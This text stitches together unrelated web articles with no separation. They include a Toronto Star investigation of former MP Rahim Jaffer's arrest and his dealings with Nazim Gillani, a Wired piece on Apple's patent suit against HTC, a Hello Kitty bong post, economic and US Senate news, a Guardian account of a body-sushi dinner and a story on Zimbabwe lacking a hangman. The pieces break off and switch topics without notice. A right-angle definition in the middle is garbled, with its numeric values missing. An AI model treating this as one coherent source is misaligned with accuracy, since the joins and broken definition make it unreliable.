Proudly displayed in their tiny OPP detachment is a MacLean ’s article on strict policing with the headline : Caledon :
Where you ca n’t get away with anything .
The intersection of Gillani , Jaffer and the waiting RIDE program is central to the unanswered question surrounding events that Thursday night – how did Jaffer escape serious charges with a slap on the wrist ?
And its raises another question – was the former MP selling government access he did not have ?
Nazim Gillani lives and works out of a rented , million dollar , two - storey home on a busy stretch of Kipling Ave. in Etobicoke .
Hanging around the house at any given time are a former CFL offensive guard who once faced steroid production and marijuana possession charges ( they were dropped ) ; a lawyer suspended three times for not cooperating with Law Society probes into his business ; a creeping nest of would - be - titans - of - finance ; and an odd parade of 20 something interns from business schools across the country .
In the driveway there is usually a Porsche Turbo , two BMWs , a sleek Infiniti , a Mercedes , and a lumbering old white van .
Gillani owns none of his empire , at least on paper .
Gillani , the ceo of ISI , is a 43 - year old wheeler dealer whose company boasts it “ has been successful in obtaining grants and loans from various Government bodies . ”
A typical day for Gillani involves a late breakfast on the Queensway , an afternoon meeting around the kitchen table at the house , an early evening visit to his “ Bloor Street Office ” ( the VIP lounge at strip joint Club Paradise ) and a dinner like this one .
At Harbour 60 , Gillani was doing what he always does : Talking big about deals .
Gillani – “ Naz ” to his pals – has a habit of finding new businesses , promising to take them public .
As the first part of that process he convinces owners of companies to pay him cash to cover his fees .
Businessmen who have walked away angry say Gillani owes them hundreds of thousands of dollars , and they received nothing in return .
Some speculate that Gillani raised money for them , and kept it .
Though some would like to complain to police , they say they are reluctant to because Gillani has told them he has compromising photographs of them at strip clubs .
Keeping a close watch on Gillani at the dinner , as he always does , was former Toronto Argonaut offensive guard Mike Mihelic , his six - foot - five inch , 310 pound vice - president of business affairs ( who owns most of the cars in the driveway ) .
Mihelic and Gillani , that night , were feeling heat from York Region Police , who were probing their involvement in a $ 1.5 million wire transfer fraud against home buildings supply company Rona , a case unrelated to Gillani ’s investment schemes .
The allegations of investment fraud were being looked into by the Integrated Market Enforcement Team , an RCMP - led task force .
Gillani was visibly drunk ; Jaffer was not , though he drank steadily .
Jaffer is known in Ottawa , where the Edmonton native was an MP for a decade , as a party animal .
To those assembled at Harbour 60 though , Jaffer explained that he could not stay out all night .
He had borrowed his wife ’s Ford Escape , parked it at the Kipling Street house , and Mihelic had driven him to Harbour 60 in the Porsche .
Jaffer said his wife , Helena Guergis , the minister of state for the status of women , was returning from a business trip and he had to get home to the house they shared in Angus .
The night progressed from cocktails to wine to liqueurs .
The women were supplied by 23 - year - old Jasmine of high class escort agency Cachet Ladies .
Gillani tells his friends he is engaged to Jasmine , whom he met a year ago on an escort date .
Jaffer , as he often does , told businessmen that he and his company , Green Power Solutions , were experts in obtaining government money .
“ I can get it , no problem , ” he said .
His company ’s promotional material boasts a “ thorough knowledge of government policies and incentive programs . ”
“ I have access to a green fund , ” Jaffer said at the table .
A few weeks before the Harbour 60 dinner , Jaffer and Gillani held court at another steak restaurant , La Castille in Etobicoke .
Gillani told a group of invited businessmen that his company could arrange start - up financing , and that Jaffer could come up with federal government funds .
Jaffer explained that he had expertise , particularly in securing what he called “ green loans ” at very low interest rates .
Though Jaffer has not been an MP since he lost an election in 2008 , he still gives out his MP business cards and did so at La Castille .
( Former and current associates of Gillani were granted anonymity for this story for several reasons , primarily because they fear physical retribution from Gillani and his associates . )
Also on hand at both steakhouses was Dr. Hai Chen , a business associate working with Gillani and Jaffer on a murky deal Gillani calls the ‘ China initiative . ’
At Harbour 60 , Jaffer and Chen made plans for the first of two trips to Shanghai to grow business contacts between Canada and China .
After Jaffer said he could secure Canadian government money for businesses , Chen said he could do the same in China .
There was much talk around the table of “ green ” projects , particularly a Canadian venture where waste could be turned into solid fuel .
Shortly before 11 pm , the dinner party ended .
The bill for dinner and drinks for nine was more than $ 3,200 .
Gillani paid and he and his guests went to the parking lot .
It ’s unclear where everyone went , but Jaffer and Mihelic drove off in the Porsche .
There was much talk at the dinner that some would head off to Club Paradise .
Constable Kim Stapleton was going off shift and left her fellow officers at the RIDE program in Palgrave at 12:45 am .
A diligent officer , she activated her mobile radar detector as she drove south through Palgrave on Highway 50 .
The speed limit in the small town was 50 kph .
The detector beeped and clocked the approaching Ford Escape SUV at 93 kph .
“ I ’ve got a high miler here , ” Stapleton said into her radio , turning on her lights .
She told Sgt. Mike Garant back at the RIDE program that she was pulling over an SUV .
Walking up to the car , the female officer shone her flashlight in at the driver .
Rahim Jaffer looked back .
Stapleton smelled alcohol and asked Jaffer several questions .
“ I smell alcohol , I am doing an alc test , ” Stapleton radioed to Garant .
Pulling a roadside breathalyzer unit from her cruiser she administered the test , which showed positive for alcohol .
Stapleton radioed for a male officer to join her because she was arresting Jaffer .
Stapleton called for a tow truck to take away the Ford .
Sgt. Garant sent an officer down to Stapleton ’s position .
The officer searched Jaffer and found a bag in his pocket , which turned out to be cocaine .
The police officers looked inside Jaffer ’s car and found a stack of Helena Guergis ’ business cards .
They drove Jaffer to the Caledon East OPP detachment and administered a blood alcohol test , which showed a level above the legal .08 level ( police have not released the level or amount of cocaine ) .
In Ontario , the penalty for being found guilty of driving above the legal level is a one year licence suspension , a $ 1,000 fine and a requirement to install an ignition lock that prevents a vehicle from starting unless the driver provides a sober breath sample .
Loading ...
Loading ...
Loading ...
Loading ...
Loading ...
Loading ...
Officers at the OPP detachment conducted a strip search of Jaffer , which police say is standard protocol when drugs are found on a person .
Stapleton charged Jaffer , 38 , with driving over the legal blood alcohol limit , speeding 93 kph in a 50 kph zone ; and possession of cocaine .
He was released from the station around 6 am on Friday , Sept. 11 .
The news of the high profile former MP ’s arrest did not trickle out for a week .
The morning Jaffer was charged , Gillani sent out an email to investors that was full of positive bluster .
“ As most of you may have heard , we had a rather earth moving experience last night at dinner with Rahim Jaffer and Dr. Chen .
Mr. Jaffer has opened up the Prime Ministers ’ office to us and as a result of that dinner – he today advised me that is just as excited as we are and joining our team seems to be the next logical step , ” Gillani wrote to a dozen close associates .
( Tory insiders say Jaffer has no such access ) .
When news of Jaffer ’s arrest leaked out the next week , it was front page news .
Toronto lawyer Howard Rubel was hired to defend Jaffer .
Jaffer told associates that the cocaine was in his jacket pocket , which was hanging in the back seat of his car , which he said meant he would likely get off on a technicality .
The police maintain the cocaine was in his pants pocket .
OPP officer Stapleton , with the realization that this high profile case was likely coming to court during her Olympic duties , prepared her notes and understood that if needed she would fly back to testify .
Meanwhile , York Regional Police detectives charged Gillani , Mihelic and several others in November with fraud in connection with a deal Gillani allegedly orchestrated .
A former senior employee of Rona was coerced into using his computer and finance knowledge to wire $ 1.5 million of Rona money to a dummy account in Hong Kong .
Jasmine , the Cachet Ladies escort , was with Gillani in his bedroom when detectives arrived to make the arrest .
Sobbing , she pleaded with them not to take her boyfriend away .
Two of those accused have said they will plead guilty in return for providing evidence against Gillani .
No findings of guilt have been made and the case continues in Newmarket court later this month .
At IMET , the detectives who investigate financial market fraud allegations , senior officer Kevin Harrison said through a spokesman that he is aware of Gillani , but wo n’t confirm that an investigation is underway .
Gillani has previously faced charges of carrying a handgun in B.C. , and is being probed in a tax evasion case .
Neither of these cases have been resolved .
Jaffer and Gillani ’s friendship and business association cooled by November , though Jaffer and Chen are still friends .
Jaffer had four brief court hearings on the cocaine and driving charges last fall and early winter .
His lawyer showed up ; he did not .
For the OPP in Caledon , the Jaffer arrest was a routine case .
That ’s why officers were surprised to be told in early January by Crown Attorney Marie Balogh that she did not want a trial .
Instead , she was seeking a guilty plea on reduced charges .
A pre-trial conference – the matters discussed are secret – was held on Feb. 18 , 2010 before a judge .
Caledon OPP were notified that the deal with Jaffer was made at “ the most senior levels ” of provincial law enforcement .
OPP Caledon pushed back but to no avail .
The next night , Jaffer and Dr. Chen had dinner to discuss their recent trip to Shanghai and another planned for April .
Jaffer told Chen his wife was flying in from Prince Edward Island – he was hoping to pick her up at the Toronto airport but heard she was delayed .
Chen said he learned the next day from news reports that the delay came because Charlottetown airport staff had asked Guergis to take her boots off for screening and the minister threw a tantrum .
Guergis later apologized .
On March 9 , 2010 , crown attorney Balogh told a hearing ( in front of a different judge ) that she was withdrawing all charges – speeding , driving over the legal blood alcohol limit , and cocaine possession – against Jaffer because there were issues with the evidence and she saw no reasonable prospect of a conviction .
She replaced the charge with one count of careless driving , to which the former MP pleaded guilty .
He was fined $ 500 and also voluntarily made a $ 500 payment to a cystic fibrosis charity .
In Ottawa , politicians speculated that Jaffer received a deal – the judge described it as “ a break ” – because of political connections .
Former Stephen Harper spokesman Kory Teneycke said that is “ ridiculous . ”
In Toronto , former associates of Gillani speculate that Jaffer has “ rolled over ” on Gillani , provided evidence , and in return was given a good deal on his drug , speeding and drunk driving charges .
Jaffer lawyer Rubel said it that is “ laughable . ”
Neither Gillani , Mihelic or Jaffer would respond to interview requests .
Gillani cancelled numerous appointments with a Star reporter .
“ Last night I woke up in excruciating pain and my feet were the size of footballs .
I do n't know what it is - but I have n't moved at all , ” Gillani wrote in one cancellation email .
Kevin Donovan can be reached at ( 416 ) 312-3503 or kdonovan@thestar.ca
Read more about :
Apple filed a patent - infringement lawsuit against HTC this week in an indirect attack against Google 's Android platform .
That got us to wondering :
If Apple wins this lawsuit , just what would a Google phone , such as the HTC - built Nexus One , look like ?
Realistically , Apple and HTC are going to reach a settlement outside of court , and the impacts on actual hardware are unpredictable .
But we thought that rather than barrage you with boring patents to explain the suit , we 'd illustrate the suit 's potential implications by describing a Google phone in the hypothetical situation where Apple won – a phone stripped of every feature that Apple 's patents lay claim to .
The patents listed in Apple 's complaints are related to touchscreens , multitouch gestures , graphical user interfaces , signal processing and other technologies Apple pioneered for the iPhone .
Here 's a hint :
If Apple had its way , a Google phone would n't be pretty .
( A hat tip to Engadget 's Nilay Patel , a former attorney , for his fantastic work rounding up and explaining the patents to help guide our analysis . )
Out of the 20 patents in question , there are a few that stand out as the most noteworthy : Patents related to the way icons automatically rearrange themselves , scrolling behavior , the " unlock " mechanism , how phones sleep and multitasking .
App Rearrangement — — — ——
–
The patent titled " Time - based , non-constant translation of user interface objects between states " describes the way a row of icons automatically rearrange when icons are added or removed .
When you delete an icon , for example , Apple 's iPhone springboard automatically shifts icons to fill an empty spot to keep rows in order .
How a Google phone would look without it
Without this ability , an Android phone 's main screen would revert to the behavior of traditional PC desktops .
On your Windows or Mac desktop , when you delete an icon , it leaves an empty space ; you must either manually move your icons or choose a command to fill in any gaps between icons .
So an Android phone 's screen would look like a cluttered mess with gaps in between icons after you deleted apps .
You 'd either have to manually drag and rearrange your apps or a tap a button to automatically sort the screen .
Unlock Mechanism — — — — —-
The " Unlocking a device by performing gestures on an unlock image " ( . pdf ) patent attempts to grant Apple the exclusive rights to using gestures for moving an unlock image to perform an unlock .
( With the iPhone , for example , you swipe the " Slide to unlock " tab to access the Home screen . )
Given the broadness of the patent , this could apply to any manner of touching buttons or making swiping gestures on a touchscreen to perform an unlock .
__How a Google phone would look without it
__Google would be forced to work around the gestural unlock mechanism .
Manufacturers would have to add an extra physical button to unlock the phone , or you 'd have to press a combination of physical buttons to perform the unlock , as you do with many older candy - bar phones .
Or perhaps to unlock the phone you would shake it , or , even sillier , speak a unique phrase into the microphone .
Worst and least likely , Google could do away with the locked screen altogether and go straight to your menu , giving thieves easy access to your apps and personal data .
Scrolling — ——
The patent titled " Touch screen device , method and graphical user interface for determining commands by applying heuristics " relates to scroll behavior on a touchscreen .
If you start scrolling in a certain direction it locks you in that direction to spare you any wobbly chaos .
And if you swipe at an angle you can pan freely .
How a Google phone would look without it
Google could either allow scrolling to be a bumpy mess , or it could again revert to the old PC desktop metaphor in which windows can be navigated with arrows ( as illustrated above ) .
Or it could require every manufacturer making an Android phone to add a scroll wheel , like the one on the Nexus One .
Notifications — —— —-
The patent " Method and apparatus for distributing events in an operating system " relates to notifications changing behavior of apps , such as in the event of a power failure .
How a Google phone would look without it
An Android phone currently notifies you when your battery is running low , and then it shuts off the GPS to conserve power .
So say goodbye to that .
Multitasking — — ——
The patent " Message protocol for controlling a user interface from an inactive program " addresses the act of a foreground application remaining active while an application running in the background is also processing .
So yes , multitasking .
Many believe the iPhone does n't have multitasking capability , but technically it does run some of Apple 's built - in apps in the background , such as the phone and the iPod .
How a Google phone would look without it
If you 're typing an e-mail on a Google phone and you get a phone call , the phone app would immediately close the e-mail , or the call would go straight to your voicemail box .
Listening to your Android phone and want to browse the web ?
Tough beans :
You can only do one at a time .
It 'll be a familiar feeling with videogame consoles , which only let you run one game at a time .
Sleep Mode — — —-
The patent " Conserving power by reducing voltage supplied to an instruction - processing portion of a process " is filled with a flurry of technical jargon , but it most likely refers to a process of reducing power consumption , or minimizing power leakage , when a device is put to sleep .
How a Google phone would look without it
Manufacturers would have to draw up alternative methods to conserve battery life in sleep mode ( which they most likely already have done ) .
Or they could foolishly let the processor run at full power even when the phone is " asleep , " which would get phones pretty hot in your pocket .
And if all else failed , manufacturers could ship phones with a battery extender to keep the phone up and running , like the modest example we 've fashioned above .
Summary — —-
Put it all together and what do we get ?
Something like the admittedly hyperbolic mock - up above .
Picture an HTC
Google phone whose desktop shows a grid of icons with gaps .
Arrows on the screen help you navigate your windows .
A physical unlock button on the phone gets you past the lock screen .
Battery life could potentially be poor in sleep mode , which could be addressed with a free battery extender – or even better , a hand - crank charger – as shown in the illustration above .
Illustration : Dennis Crothers / Wired.com
Hmmmm , this Hello Kitty mod is taking Hello Kitty ’s main goal in life of alternating everyone ’s state of mind to a whole new level – the Hello Kitty bong :
When I saw this , I mentioned to my wife that I would not be surprised if Sanrio is in the process of developing a Hello Kitty brand of pot that would help alter people ’s perception to instantly fall in love with Hello Kitty .
To which my wife responded with a smile , “ It ’s not needed .
We are all high on Hello Kitty just the way she is ” — and that , my friends , typifies the Hello Kitty Hell I live in …
Thanks to way too many readers ( via two twenty ) who obviously must be smoking the stuff to spend so much time looking for Hello Kitty crap to email to me …
Update : another Hello Kitty bong photo left by jennell in the comments :
Left in the comments by Harlock
Sent in by Jean [ apparently there is now a retail line … ]
Close - ups left by filipetadamassa on twitter
Sent in by james ( via friend without the r )
Sent in by Lorie
Sent in by Pearly
Economists : Another Financial Crisis on the Way A nonpartisan group led by Nobel winner calls for stronger financial reforms .
March 2 , 2010  --
Even as many Americans still struggle to recover from the country 's worst economic downturn since the Great Depression , another crisis – one that will be even worse than the current one – is looming , according to a new report from a group of leading economists , financiers , and former federal regulators .
In the report , the panel , which includes Rob Johnson of the United Nations Commission of Experts on Finance and bailout watchdog Elizabeth Warren , warns that financial regulatory reform measures proposed by the Obama administration and Congress must be beefed up to prevent banks from continuing to engage in high - risk investing that precipitated the near - collapse of the U.S. economy in 2008 .
The report warns that the country is now immersed in a " doomsday cycle " wherein banks use borrowed money to take massive risks in an attempt to pay big dividends to shareholders and big bonuses to management – and when the risks go wrong , the banks receive taxpayer bailouts from the government .
" Risk - taking at banks , " the report cautions , " will soon be larger than ever . "
Without more stringent reforms , " another crisis – a bigger crisis that weakens both our financial sector and our larger economy – is more than predictable , it is inevitable , " Johnson says in the report , commissioned by the nonpartisan Roosevelt Institute .
The institute 's chief economist , Nobel Prize - winner Joseph Stiglitz , calls the report " an important point of departure for a debate on where we are on the road to regulatory reform . "
The report blasts some of Washington 's key players .
Johnson writes , " Our government leaders have shown little capacity to fix the flaws in our market system . "
Two other panelists , Simon Johnson , a professor at MIT , and Peter Boone of the Centre for Economic Performance , voiced similar criticisms .
Federal Reserve Chairman Ben Bernanke and Treasury Secretary Tim Geithner " oversaw policy as the bubble was inflating , " write Johnson and Boone , and " these same men are now designing our ' rescue . ' "
The study says that " In 2008 - 09 , we came remarkably close to another Great Depression .
Next time we may not be so ' lucky . '
The threat of the doomsday cycle remains strong and growing , " they say .
" What will happen when the next shock hits ?
We may be nearing the stage where the answer will be – just as it was in the Great Depression – a calamitous global collapse . "
The panelists call for major banks to maintain liquid capital of at least 15 to 25 percent of their assets , the enactment of stiffer consequences for executives of bailout recipients and for government officials to start breaking up firms that grow too big .
In the report , Elizabeth Warren , who was chair of the Congressional Oversight Panel , reiterates her calls for an independent agency to protect consumers from abusive Wall Street practices .
" While manufacturers have developed iPods and flat - screen televisions , the financial industry has perfected the art of offering mortgages , credit cards and check overdrafts laden with hidden terms that obscure price and risk , " Warren writes .
" Good products are mixed with dangerous products , and consumers are left on their own to try to sort out which is which .
The consequences can be disastrous . "
Frank Partnoy , a panelist from the University of San Diego , claims that " the balance sheets of most Wall Street banks are fiction . "
Another panelist , Raj Date of the Cambridge Winter Center for Financial Institutions Policy , argues that government - backed mortgage giants Fannie Mae and Freddie Mac have become " needlessly complex and irretrievably flawed " and should be eliminated .
The report also calls for greater competition among credit rating agencies and increased regulation of the derivatives market , including requiring that credit - default swaps be traded on regulated exchanges .
With the Senate Banking Committee , led by Chris Dodd , D - Conn. , poised to unveil its financial regulatory reform proposal sometime in the next week , the report calls on Congress to enact reforms strong enough to prevent another meltdown .
" Sen . Dick Durbin once said the banks ' owned ' the Senate , " says Johnson .
" The next few weeks will determine whether or not that statement is true . "
In response to the report , a spokesman for the Treasury Department told ABC News that the administration 's regulatory reform proposals would be the most significant Wall Street overhaul in generations .
" We laid out our strong principles of reform last June and we have been fighting every day since to see them enacted in law , " said Treasury spokesman Andrew Williams .
" While we have a tough fight ahead , we are getting close to seeing Congress pass the most significant overhaul of the financial sector in our lifetimes . "
Right Angle
A right angle is an angle equal to half the angle from one end of a line segment to the other .
A right angle is radians or .
A triangle containing a right angle is called a right triangle .
However , a triangle cannot contain more than one right angle , since the sum of the two right angles plus the third angle would exceed the total possessed by a triangle .
The patterns of cracks observed in mud that has been dried by the sun form curves that often intersect in right angles ( Williams 1979 , p. 45 ; Steinhaus 1999 , p. 88 ; Pearce 1990 , p. 12 ) .
© Steve Sack
After spending an hour interviewing Democratic Congressman Eric Massa , who was just forced to resign , Glenn Beck admitted “ America , I ’m gonna shoot straight with you .
I think I ’ve wasted your time .
I have wasted an hour of your time .
And I apologize for that . ”
Should n’t he end every one of his shows that way ?
UPDATE : Good article about Glenn Beck and Eric Massa at Crooks and Liars .
As I booked a ticket for the most expensive meal I have ever eaten , it did ­occur to me that I do n't like sushi .
But this was not the only problem for someone who has been a lifelong ­feminist campaigner against the sexual exploitation of women : I was about to eat raw fish off a naked woman 's body .
I first noticed the publicity for a monthly series of British " nyotaimori " evenings last summer .
Nyotaimori , or body sushi , is Japanese , and it is n't normally on offer in London .
But periodically temporary operations do pop up in cities around the world , each time sparking newspaper headlines .
The word nyotaimori is usually translated as " female body presentation " , but a friend who has studied Japanese tells me it means something more like " piling something on top " .
Which sounds significantly less appetising .
" Flash Sushi will offer a limited number of places to this unique ­experience , " the advance publicity for these new British evenings said .
" Places are extremely limited and demand is high .
Guests will ONLY be informed of the location of the next Flash Sushi dinner once they have paid for their sitting in full . "
What did the organisers expect to happen ?
Hordes of hungry sushi devotees turning up at the venue ­begging for a pair of chopsticks ?
No , they ­simply wanted to avoid the kind of scenes witnessed in Seattle in 2003 when a group of angry feminists waved placards and shouted as diners made their way in for a nyotaimori dinner .
Anyway , on Wednesday , this angry feminist arrived at the London address she had been sent after shelling out £ 250 .
I had to walk through a hippy cafe serving bean stew and carrot salad , and then finally – after going up and down a filthy fire escape and getting lost in a dark corridor smelling of cats – I pushed open a door and found myself in a dark room festooned with purple velvet and filled mostly with men in their 20s sipping champagne .
I was greeted by a Japanese woman in traditional dress and , down a steep set of stairs , caught a glimpse of the dining room .
It was 7.05 pm , dinner was due to begin in 25 minutes , but the naked women were already in situ , laid out as if in a morgue , ­awaiting a postmortem .
I stood out a little amid the assembled diners .
There were two other women , but they were hanging on to the arms of their partners and were dressed to the nines .
Soon , however , I was chatting to Ben , a money ­broker , recently divorced and in his 50s .
He was at my table with two young ­bankers and their partners .
The other table was all male , and , like everyone on my table , all white .
As we sat down , I realised the claims that " demand is high " for such dinners are rubbish : the trestle tables were easily long enough for 24 , but there were only 12 diners .
In fact , nyotaimori may take place in Japan , but it is stigmatised there and usually only found in seedy sex clubs .
But wherever and whenever it is launched overseas , it is marketed as a form of Japanese food culture , and this was , ostensibly , what the meal on Wednesday night was about .
Our human plate was olive skinned , with ( as far as I could gather ) no body hair and naked except for a few strategically placed banana leaves and rose petals .
Her eyes were shut .
If it was not for the fact you could see her breathing – and the odd flutter of her eyelid – she could indeed have been a body in a ­mortuary .
There was nothing remotely erotic about the sight .
The first course arrived , plus more champagne and sake .
Soon the men were getting sloshed .
I started to worry about their chopstick use , so much so that I ­offered to serve the salmon sashimi to the banker sitting furthest away from the plate .
Loud guffaws from the other table , followed by clapping , came in response to one of the men dropping his piece of sushi on the woman 's groin area .
Ben spent most of the evening ­telling me how nyotaimori is not ­demeaning to the women .
" So long as they get paid , " he argued , it is no different from being an artist 's model .
" In fact , it is art , " he said , warming to his theme .
Our human platter did not look warm .
I was dressed for the freezing cold weather outside and was slightly chilly .
She had goose bumps , and it was not yet 8 pm .
The dinner was due to finish at 10.30 pm .
If it was torture for me being here , what was it like for the plate ?
" What I like about her , " said Ben , ­indicating our plate – who , playing dead a mere two feet from our mouths , could obviously hear every word we said – " is that ­occasionally she has a very slight smile on her face . "
I could only imagine that she was fantasising about sticking chopsticks in the eyes of each and every one of us .
At one point I moved my notebook and accidentally knocked the plate 's ­fingers .
She remained impassive .
Andy , one of the bankers , told me a story he had heard the day before about ­nyotaimori .
" Some geezer told me you can cop a feel of the birds , you know , slide your hand under the leaves when you are getting the food .
So I called the organisers and asked if that goes on , and she tells me , ' No way .
It is art . '
So I knew it was OK to bring the missus . "
Eventually , a break was announced in order for the " models " , as our host referred to the human plates , to " stretch their legs " .
We were led upstairs .
I asked how much the plates are paid .
" I do n't know , " said the host .
" We hire them through an agency . "
Do they have any special training ?
One often reads about how the plates involved in body sushi are " trained " to lie still for hours .
" No , but we do n't take women with large breasts as the food would slide off . "
Were these events usually men-only ?
" Yes , but when there are ladies present it civilises the men . "
What ­happens when they are not being ­civilised ?
" Oh , nothing much , just boys ' stuff . "
Ben told the host how much he was enjoying himself .
" And the presence of these ladies has totally legitimised it – I no longer feel like a dirty old man . "
One of the men from the adjoining table approached Ben and the ­bankers .
" Can we swap tables with you ?
Your model is gorgeous . "
But there was no need .
As we were led back downstairs I saw that the plates had swapped already .
Our new one had a ­tattoo on her upper arm facing me and her feet were bigger than the previous one's .
Her eyes were closed and she too looked dead except for the breathing .
I wondered what would happen if she got a terrible itch .
More food ­arrived , this time hot , and the banker , in his haste , dropped a piece of hot cod on one thigh .
" I wonder if , when she gets home , her husband says , ' Christ , woman , you stink of fish ! ' " said Ben .
I asked the women at my table what they thought of the evening .
" Great , " they chorused .
" The food is lovely , the candles are beautiful and I love the atmosphere , " said one .
But what about the human plates ?
" I 'd forgotten about them , " she said , unconvincingly .
Not for the first time that evening , I wished I was outside in the freezing cold , shouting and waving a placard .
Names have been changed .
Bunning and Democrats have backed down on a tense debate over health care reform and will vote on amendments March 2 , 2010 .
Senate clears Bunning roadblock
The Senate overwhelmingly voted Tuesday night to restore benefits to the nation ’s jobless , ending an increasingly acrimonious battle with Sen. Jim Bunning ( R - Ky . ) who had mounted an unyielding stand against a broad range of funding for expiring domestic aid programs .
With support from Republicans crumbling , Bunning acquiesced to demands from Democrats that he relent on his objections and allow a vote to go forward on a $ 10 billion package to temporarily extend unemployment insurance , health care coverage to the jobless , federal flood insurance , a rural satellite TV program and allow more than 2,000 furloughed workers to return working on federal construction projects .
Advertisement
By a 78 - 19 vote , the Senate sent the bill to President Barack Obama , who promptly signed it Tuesday night , saying in a statement that he was " grateful to the members of the Senate on both sides of the aisle who worked to end this roadblock to relief for America ’s working families . "
Twenty - one Republicans joined a united Democratic caucus in voting for the measure .
And the politics of deficit spending appeared to split the GOP leadership , with Senate Minority Leader Mitch McConnell , GOP Conference Chairman Lamar Alexander , GOP Policy Chairman John Thune and National Republican Senatorial Committee Chairman John Cornyn voting against it , and Minority Whip Jon Kyl and Conference Vice Chairwoman Lisa Murkowski voting for the measure .
During the vote , the irascible Bunning spent his time talking to the floor staff and retreating to the GOP cloak room – largely avoiding mingling with his GOP colleagues who had taken a big political hit for his decision to repeatedly object to passing the measure .
The drama - free vote belied the fluid negotiations that took place throughout Tuesday , with Democrats using their upper hand to force Republicans eager to end the controversy to bend to their will and limit the amount of amendments the Senate would ultimately consider .
As part of the face - saving deal , Bunning was allowed to offer an amendment that would pay for the $ 10 billion package by narrowing the scope of a federal biofuels tax credit .
Before the Senate voted down his amendment by a 43 - 53 vote , Bunning angrily accused Democrats of mismanaging the floor calendar to prevent the $ 10 billion package from becoming law and allowing the popular provisions to expire Sunday night .
“ He could have accepted my request to pay for the bill , and we would not be here tonight , ” Bunning said sternly , referring to Majority Leader Harry Reid ( D - Nev. ) .
“ Instead , the leader decided to press ahead with a bill that adds to the debt and violates the principles of pay / go that everybody claims to care about . ”
But Democrats , badly damaged in the polls and in disarray over their party ’s agenda , were eager for a fight that would quickly unify their party .
They waged a fierce campaign to paint Bunning and a complicit GOP as insensitive to the millions of jobless Americans – calling for quick acceptance of the $ 10 billion plan .
And they said that Bunning had essentially been offered the same deal last week , which he rejected at the time .
“ During this one - week period of time while the senator from Kentucky could have offered an amendment , he didn’t , ” said Senate Majority Whip Dick Durbin ( D - Ill . ) .
“ And , as a result , on Sunday night , unemployment benefits were cut off for thousands of people across America , thousands of people across America , assistance of health insurance cut off all across America , thousands of federal employees were furloughed , federal contracts for construction were suspended . ”
Bunning ’s move stunned his GOP colleagues , who had remained largely quiet about the matter but returned to the Senate Tuesday with new incentive to get the unpredictable 78 - year - old retiring conservative senator to back down .
But Bunning has no loyalty to party politics , and remains resentful of his home - state colleague , McConnell , who quietly pressured Bunning to abort his 2010 reelection bid over fears that he ’d lose a critical GOP seat .
With Bunning showing no signs of backing down , Republicans spent Tuesday going into overdrive to end a damaging story .
First , Sen. Susan Collins ( R - Maine ) contacted McConnell to inform him that she planned to make clear that Republicans did n’t agree with Bunning ’s approach and wanted to extend the popular benefits .
Secondly , negotiations began between Bunning ’s staff and top Republicans over resolving the cantankerous senator ’s objection .
Third , a group of senators who have been sympathetic to Bunning approached him to try to broker a deal and end his politically damaging standoff on the Senate floor .
“ It ’s fair to say that I asked Sen .
Bunning today if there was a way to work out a win for both sides , ” Corker told POLITICO .
“ It ’s fair to say that I did ask him today if there ’s a win -win . ”
And many Republicans sensed a lose - lose situation if the situation continued .
Moments after she became the first Senate Republican to forcefully criticize Bunning , Collins said she wanted to make clear that Bunning did n’t speak for the party .
“ It ’s important that the American people understand that there is bipartisan support for extending these vital programs – this is not a partisan issue , ” Collins said .
“ It only adds to the frustration of the American people when we are unable to act on a measure that has overwhelming support . ”
But Collins was n’t alone , as a wide spectrum of the Republican Senate Conference watching Bunning ’s one man show become increasingly concerned Tuesday .
Asked if he was worried about the public perception that Republicans are obstructionists , Sen. Jim Inhofe ( R - Okla . ) , one of the more conservative members of the Senate , said : " I am concerned about that , "
“ Whatever problems this creates for our budget is small — we've already got a mess , ” said Sen. Lindsey Graham ( R - S.C. ) , who voted for the measure .
“ For the families involved , this is devastating .
How much does this affect the federal budget ’s deficit ?
A very small part .
That 's not a justification for running it up , however , when it comes to the family income , it 's everything .
It 's all they 've got . ”
McConnell , who has avoided the controversy over his home - state colleague , said that he was “ pleased that Sen .
Bunning will have an opportunity to offer the amendments that he thinks are important and that he has been stressing for the last few days .
And I ’m glad we were able to work this out and move with the business of the Senate . ”
Indeed , Republicans hoped that the Senate will move onto more politically palatable measures .
“ It ’s like a lot of things around here , there ’s a tremendous amount of focus on it one day and – boom – it ’s over the next , ” said Thune .
“ And so I do n’t anticipate that it has any impact . ”
Meredith Shiner contributed to this story
Financial reform failed to advance in the Senate for the third straight day Wednesday afternoon , and Sen. Claire McCaskill says Democrats could hold the upper chamber in session through the night , attempting to bring their Wall Street bill to the floor for debate .
" I think we 're gonna go all night , " McCaskill told MSNBC 's Andrea Mitchell in a live interview this afternoon .
" We 're talking about staying all night and continually asking our colleagues across the aisle to allow us to debate this bill , " the Missouri Democrat said .
Democrats have held votes Monday , Tuesday , and Wednesday seeking to open floor debate on their financial reform bill .
Each vote has failed , with Republicans unified in voting " no . "
Sen. Ben Nelson ( D - NE ) has joined them .
We want to hear what you think about this article .
Submit a letter to the editor or write to letters@theatlantic.com .
Job vacancy : male applicants only .
Skills required : dexterity , ability to tie a knot , hard heart .
Anyone prone to hesitation or mercy need not apply .
Zimbabwe is searching for a hangman .
Chikurubi prison , a maximum security facility outside Harare , has been trying to fill the post for five years , but in vain , the Daily News of Zimbabwe reported yesterday .
The absence of an executioner is a mixed blessing for 50 condemned men .
It is a reprieve , but it is also an agonising and indefinite wait on death row in a jail dubbed a " gulag " because of its inhumane conditions .
Zimbabwe 's last hangman quit the post in 2005 after hanging two armed robbers who murdered a prison guard while escaping jail .
The job has since remained unfilled , despite unemployment in the country hitting 94 % last year .
The Daily News set out the requirements for any would - be Albert Pierrepoint : " Prison officials say the job of a hangman involves techniques and procedures that are very simple to learn .
The candidate for the job need not possess any previous experience , neither does he have to be literate .
The hangman 's job is reserved only for men .
The job demands strength and unwavering focus .
It is not for the faint - hearted .
" If a hangman is found , jail officials would teach him how to tie the noose and train him to maintain the correct posture while executing , as this is vital . "
It added : " But it appears the toughest part of the job is not about ropes and levers .
It is about conscience .
" A hangman should never have second thoughts , if he does he should be retired , " said a former principal prison officer , who spoke to the Daily News on condition of anonymity .
Lawyers and journalists based in Harare confirmed with the Guardian today that the prison has been struggling to find a hangman for years .
" We 've not had an execution for a long time , " one said .
Some death row inmates have languished in solitary confinement for more than a decade .
Their petitions for clemency have been rejected by Robert Mugabe , Zimbabwe 's president .
Last month , one death row inmate , Shepherd Mazango , challenged the impasse in an appeal to Zimbabwe 's supreme court .
